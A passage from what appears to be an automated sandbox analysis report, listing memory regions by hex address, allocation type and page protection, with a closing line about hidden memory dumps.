heap
|
page read and write
|
||
|
4C77000
|
heap
|
page read and write
|
||
|
23A8C000
|
stack
|
page read and write
|
||
|
D6590FD000
|
stack
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
3780000
|
heap
|
page read and write
|
||
|
20B74B8C000
|
heap
|
page read and write
|
||
|
20B74C46000
|
heap
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
365B000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
8EE000
|
stack
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
2316000
|
heap
|
page read and write
|
||
|
D40000
|
unkown
|
page readonly
|
||
|
2C8B000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
5E20000
|
direct allocation
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
743D000
|
stack
|
page read and write
|
||
|
210000
|
unkown
|
page readonly
|
||
|
8120000
|
direct allocation
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
29BF000
|
unkown
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
2D1438D000
|
stack
|
page read and write
|
||
|
363C000
|
heap
|
page read and write
|
||
|
53BE000
|
stack
|
page read and write
|
||
|
74D6000
|
heap
|
page read and write
|
||
|
365B000
|
heap
|
page read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
1450000
|
unkown
|
page readonly
|
||
|
7FFD9B69C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
9FA000
|
heap
|
page read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
938000
|
heap
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
5DC0000
|
direct allocation
|
page read and write
|
||
|
857C000
|
stack
|
page read and write
|
||
|
6C9E000
|
stack
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
43B000
|
stack
|
page read and write
|
||
|
20B5CC43000
|
trusted library allocation
|
page read and write
|
||
|
5F99000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
36AD000
|
heap
|
page read and write
|
||
|
20B5C9DC000
|
trusted library allocation
|
page read and write
|
||
|
75FD000
|
stack
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
215BF000
|
stack
|
page read and write
|
||
|
3649000
|
heap
|
page read and write
|
||
|
4C70000
|
heap
|
page read and write
|
||
|
6D6B000
|
stack
|
page read and write
|
||
|
115C000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
81BA000
|
heap
|
page read and write
|
||
|
2FDA000
|
heap
|
page read and write
|
||
|
20B5AA49000
|
heap
|
page read and write
|
||
|
D20000
|
unkown
|
page readonly
|
||
|
2414A000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
724D000
|
heap
|
page read and write
|
||
|
44D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
71B6000
|
heap
|
page read and write
|
||
|
4AF7000
|
heap
|
page read and write
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
1480000
|
unkown
|
page read and write
|
||
|
82A0000
|
heap
|
page read and write
|
||
|
33F4000
|
heap
|
page read and write
|
||
|
23FE9000
|
heap
|
page read and write
|
||
|
365E000
|
heap
|
page read and write
|
||
|
7432000
|
heap
|
page read and write
|
||
|
23F44000
|
heap
|
page read and write
|
||
|
9FA000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
3649000
|
heap
|
page read and write
|
||
|
9F6000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
2B4B000
|
heap
|
page read and write
|
||
|
756B000
|
stack
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
DA0000
|
unkown
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
233CF000
|
unclassified section
|
page execute and read and write
|
||
|
2A868FA5000
|
heap
|
page read and write
|
||
|
364F000
|
heap
|
page read and write
|
||
|
1B9F82C0000
|
heap
|
page read and write
|
||
|
4E3B000
|
trusted library allocation
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
46E8000
|
trusted library allocation
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
828C000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
45B0000
|
trusted library section
|
page read and write
|
||
|
73F5000
|
heap
|
page read and write
|
||
|
11A0000
|
unkown
|
page readonly
|
||
|
6E70000
|
heap
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
2874000
|
heap
|
page read and write
|
||
|
6E75000
|
heap
|
page execute and read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
34C8000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
DF8000
|
heap
|
page read and write
|
||
|
20B5E5DE000
|
trusted library allocation
|
page read and write
|
||
|
21E000
|
unkown
|
page readonly
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
233A0000
|
unclassified section
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
770C000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
12A1000
|
unkown
|
page readonly
|
||
|
2D1448B000
|
stack
|
page read and write
|
||
|
9962000
|
direct allocation
|
page execute and read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
378C000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
3635000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
4C85000
|
heap
|
page read and write
|
||
|
950000
|
unkown
|
page readonly
|
||
|
7E97000
|
trusted library allocation
|
page read and write
|
||
|
3643000
|
heap
|
page read and write
|
||
|
821E000
|
stack
|
page read and write
|
||
|
70C0000
|
heap
|
page read and write
|
||
|
5B40000
|
heap
|
page read and write
|
||
|
371A000
|
heap
|
page read and write
|
||
|
4690000
|
heap
|
page read and write
|
||
|
7FEF000
|
stack
|
page read and write
|
||
|
358F000
|
heap
|
page read and write
|
||
|
47A0000
|
trusted library allocation
|
page read and write
|
||
|
80E0000
|
direct allocation
|
page read and write
|
||
|
35CA000
|
heap
|
page read and write
|
||
|
7F6000
|
heap
|
page read and write
|
||
|
23FB0000
|
heap
|
page read and write
|
||
|
23F2C000
|
heap
|
page read and write
|
||
|
878D000
|
stack
|
page read and write
|
||
|
4BFA000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
4578000
|
heap
|
page read and write
|
||
|
35E1000
|
heap
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
368E000
|
heap
|
page read and write
|
||
|
4D77000
|
trusted library allocation
|
page read and write
|
||
|
365E000
|
heap
|
page read and write
|
||
|
4AFA000
|
heap
|
page read and write
|
||
|
47FE000
|
stack
|
page read and write
|
||
|
2C3D000
|
stack
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
3659000
|
heap
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7C52000
|
remote allocation
|
page execute and read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
737E000
|
stack
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F3A000
|
stack
|
page read and write
|
||
|
21D7D000
|
direct allocation
|
page execute and read and write
|
||
|
23F44000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
84DD000
|
stack
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
B63000
|
heap
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
4E6F000
|
trusted library allocation
|
page read and write
|
||
|
53E1000
|
heap
|
page read and write
|
||
|
23580000
|
heap
|
page read and write
|
||
|
5F86000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
1B9F6850000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
537F000
|
stack
|
page read and write
|
||
|
1290000
|
unkown
|
page read and write
|
||
|
864D000
|
stack
|
page read and write
|
||
|
5F90000
|
heap
|
page read and write
|
||
|
3658000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
21D79000
|
direct allocation
|
page execute and read and write
|
||
|
83AF000
|
stack
|
page read and write
|
||
|
50D8000
|
trusted library allocation
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
7430000
|
heap
|
page read and write
|
||
|
23F98000
|
heap
|
page read and write
|
||
|
8180000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
AD8000
|
heap
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
4450000
|
trusted library allocation
|
page read and write
|
||
|
20B74A20000
|
heap
|
page read and write
|
||
|
4890000
|
heap
|
page read and write
|
||
|
1B9F68BF000
|
heap
|
page read and write
|
||
|
2DDA000
|
heap
|
page read and write
|
||
|
28C0000
|
unkown
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
80D0000
|
direct allocation
|
page read and write
|
||
|
6750000
|
trusted library allocation
|
page read and write
|
||
|
366C000
|
heap
|
page read and write
|
||
|
BB1000
|
heap
|
page read and write
|
||
|
826C000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
539F000
|
stack
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
5E52000
|
remote allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7FFD9B696000
|
trusted library allocation
|
page read and write
|
||
|
23F2C000
|
heap
|
page read and write
|
||
|
210000
|
unkown
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2D8C000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
85E0000
|
direct allocation
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
5F86000
|
heap
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
82F000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
21A13000
|
heap
|
page read and write
|
||
|
2B30000
|
trusted library section
|
page read and write
|
||
|
217AC000
|
stack
|
page read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
6DE0000
|
direct allocation
|
page read and write
|
||
|
4950000
|
heap
|
page execute and read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
4C9D000
|
heap
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
6AE000
|
stack
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
20B5AC65000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
58B1000
|
trusted library allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
5EF0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B74B67000
|
heap
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2D133FC000
|
stack
|
page read and write
|
||
|
4C69000
|
heap
|
page read and write
|
||
|
2D134BE000
|
stack
|
page read and write
|
||
|
82D8000
|
heap
|
page read and write
|
||
|
481D000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
21E000
|
unkown
|
page readonly
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
3B8E000
|
direct allocation
|
page execute and read and write
|
||
|
20B5A8E0000
|
heap
|
page read and write
|
||
|
45D0000
|
trusted library allocation
|
page read and write
|
||
|
69BE000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
2CBD000
|
heap
|
page read and write
|
||
|
23CCD000
|
stack
|
page read and write
|
||
|
2B48000
|
heap
|
page read and write
|
||
|
20B74B9E000
|
heap
|
page read and write
|
||
|
3680000
|
trusted library allocation
|
page read and write
|
||
|
2BB8000
|
heap
|
page read and write
|
||
|
34EE000
|
heap
|
page read and write
|
||
|
562E000
|
trusted library allocation
|
page read and write
|
||
|
211000
|
unkown
|
page execute read
|
||
|
81AE000
|
heap
|
page read and write
|
||
|
37FD000
|
stack
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
819C000
|
stack
|
page read and write
|
||
|
832000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
2310000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
B62000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page readonly
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
DB1000
|
unkown
|
page readonly
|
||
|
23F83000
|
heap
|
page read and write
|
||
|
4462000
|
trusted library allocation
|
page read and write
|
||
|
2343D000
|
unclassified section
|
page execute and read and write
|
||
|
5B4F000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
4B06000
|
heap
|
page read and write
|
||
|
1B9F8501000
|
trusted library allocation
|
page read and write
|
||
|
21F92000
|
direct allocation
|
page execute and read and write
|
||
|
4627000
|
trusted library allocation
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page execute and read and write
|
||
|
14CF000
|
heap
|
page read and write
|
||
|
211000
|
unkown
|
page execute read
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
74DB000
|
heap
|
page read and write
|
||
|
9FA000
|
heap
|
page read and write
|
||
|
366B000
|
heap
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
4374000
|
unkown
|
page read and write
|
||
|
3848000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
227000
|
unkown
|
page readonly
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
39E6000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
unkown
|
page readonly
|
||
|
838000
|
stack
|
page read and write
|
||
|
5F90000
|
heap
|
page read and write
|
||
|
366F2000
|
system
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
5F22000
|
heap
|
page read and write
|
||
|
868D000
|
stack
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
115C000
|
stack
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
21349000
|
heap
|
page read and write
|
||
|
3A08000
|
unkown
|
page read and write
|
||
|
4AC9000
|
trusted library allocation
|
page read and write
|
||
|
2EED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D27000
|
heap
|
page read and write
|
||
|
23F1A000
|
heap
|
page read and write
|
||
|
216DE000
|
stack
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
13FE000
|
stack
|
page read and write
|
||
|
9F5000
|
heap
|
page read and write
|
||
|
4480000
|
trusted library allocation
|
page read and write
|
||
|
D20000
|
unkown
|
page readonly
|
||
|
74E7000
|
heap
|
page read and write
|
||
|
7FAD000
|
stack
|
page read and write
|
||
|
8180000
|
direct allocation
|
page read and write
|
||
|
5094000
|
unclassified section
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
heap
|
page read and write
|
||
|
20B5C310000
|
trusted library allocation
|
page read and write
|
||
|
2B7C000
|
heap
|
page read and write
|
||
|
71E000
|
stack
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
23F3C000
|
heap
|
page read and write
|
||
|
6A40000
|
heap
|
page execute and read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
23090000
|
direct allocation
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
7FFD9B79A000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
5DA0000
|
direct allocation
|
page read and write
|
||
|
3645000
|
heap
|
page read and write
|
||
|
D6592FF000
|
stack
|
page read and write
|
||
|
328F000
|
stack
|
page read and write
|
||
|
4052000
|
remote allocation
|
page execute and read and write
|
||
|
366C000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page read and write
|
||
|
2E1B000
|
heap
|
page read and write
|
||
|
5E30000
|
direct allocation
|
page read and write
|
||
|
23D0E000
|
stack
|
page read and write
|
||
|
4360000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
3830000
|
heap
|
page read and write
|
There are 1920 hidden memdumps, click here to show them.